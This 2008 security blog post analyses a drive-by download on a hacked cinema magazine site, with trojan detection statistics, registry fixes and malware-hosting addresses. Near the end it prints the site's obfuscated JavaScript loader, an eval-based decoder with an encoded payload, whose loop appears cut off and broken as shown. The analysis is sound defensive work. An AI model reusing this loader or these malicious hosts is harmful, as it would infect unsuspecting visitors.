Jul 11, 2008

3 mins of innocent browsing on the Wild Wild Web

Focus of the post:- Drive by downloads by malicious javascript and iframes tags.

Press the full screen button

The hacked page of cinema-systemsindia.com,self proclaimed india's leading cinemagazine leads to a couple a silent trojan downloads.At the time of writing the post the trojans arent detected by any of the major antivirus firms except NOD32 (scan).AVG AV with its Link Scanner completely fails here. Internet Explorer users get completely owned but google and Firefox 3 users are warned about the malicious content on the page



                                                                                                       
Using an updated antivirus system isnt a sufficient solution for a windows desktop system,the most surprising thing is that all the trojans downloaded from the hacked url were not detected by any of the major av's(scan1). The inbuilt heuristic scanning is pretty useless.
Malware Stats (Kaspersky names) 
havp2d.exe - 3/30 (-)  
tpzhzx.exe - 7/33 (-)  
svchddd.ex - 10/33 (Trojan-Spy.Win32.Zbot.dag)  
file.bat - 5/33 (Trojan-Proxy.Win32.Small.mu)  
lphcp1uj0egl5.exe - 8/33 (-)  
scchost.exe - 16/33 (Trojan-Proxy.Win32.Small.sl)  
index.exe - 11/33 - (-)  
blphct1lj0ec4c.scr - 6/33(-)  
phcp1uj0egl5.bmp - 3/33 (-)
winlogon.exe - 5/33 (Trojan-Proxy.Win32.Small.st)

Charitable IP's 
87.118.117.138/ho.php (Trojan-Downloader.JS.Iframe)  
neiron2009.com/check/vers155.php?q=1 (Trojan-Downloader.Win32.Winlagons.vb)

Google and Firefox 3 prevented the malicious loading of the url.  
The Google Diagnostic Page Stats on cinema-systemsindia.com page :- What happened when Google visited this site? Of the 33 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/08/2008, and the last time suspicious content was found on this site was on 06/06/2008. Malicious software includes 12 trojan(s). Successful infection resulted in an average of 7 new processes on the target machine. Malicious software is hosted on 3 domain(s), including sum4count.net, 78.109.30.0, try-count.net. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gate4clicks.net.  

Spyware Wallpaper - The malware hides the wallpaper tab in Display Properties to prevent you from changing the wallapaper ,to bring it back make the following changes in registry:-


REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispBackgroundPage"=dword:00000000

Fake Sysinternals Screensaver

A modified fake sysinternals Blue Screen of Death screensaver with progress bar is installed by the malware.To prevent you from changing the screensaver,the malware hides the screensaver tab in display properties.Make the following registry changes.
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispScrSavPage"=dword:00000000

Malicious obfuscated Javascript,complete dissection of the url is here

function tdoban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,18,23,53,49,39,44,25,33,54,0,0,0,0,
0,0,9,2,46,21,56,42,26,48,35,6,1,17,16,24,30,58,3,4,43,12,51,61,27,37,14,29,32,0,0,0,0,38,0,8,5,20,60,47,28,52,7,45,19,2
2,31,55,36,10,15,41,13,11,50,59,62,34,57,40,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--)
{{w|=(t[x.charCodeAt(p++)-48])<>=8;s-=2}else{s=6}}}eval(r);
}}tdoban('bB@5k978fhy8jFD8Jvf399@52kYtk97nhvxWfFambAD_INq9Cud_cADnlNqgfXx52vfGIV@G2oYZzIxTLRq8IoatYmYWjFDWIhq5VI7_Jtr52F
MmI9YTC5UejFy_fPM5htqWF0unIE@mzX@5k9x5Fer9IjS4Qed972YGIV@G2kY9CPigbBqWIExTIpfG1RxWVkq_IvdGPh6gJFDwNNxTLVx_Joy5jBatf9@52A
rTXmU_cADnlN@TCer') 


0 comments:

Post a Comment